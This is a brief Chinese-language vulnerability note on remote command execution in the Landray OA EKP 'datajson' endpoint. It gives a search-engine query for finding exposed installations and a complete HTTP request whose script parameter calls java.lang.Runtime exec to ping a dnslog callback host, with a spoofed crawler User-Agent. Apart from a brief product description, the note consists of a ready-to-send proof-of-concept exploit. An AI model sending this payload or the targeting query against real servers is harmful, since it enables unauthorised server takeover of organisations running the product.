登录 白背景

蓝凌OA EKP datajson存在远程命令执行漏洞

一、漏洞简介

蓝凌OA EKP,是蓝凌旗下的协同办公平台,其定位在平台型产品,它是结合蓝凌知识管理及移动互联网理念设计,综合企业管理支撑系统发展而来,并将协同办公、知识共享、文化管理、战略管理等融合为一体,通过企业门户统一战线,满足用户个性化办公要求的一体化工作平台。蓝凌OA EKP datajson存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。

二、漏洞简介

  • 蓝凌OA EKP

三、资产测绘

  • hunterapp.name="Landray 蓝凌OA"
  • 特征

image.png

四、漏洞复现

GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%205vfzyo.dnslog.cn%22)&type=1 HTTP/1.1
Host: 
Pragma: no-cache
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache

image.png
image.png

landray_ekp_datajson_rce.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/zgo31elwybz3g7a8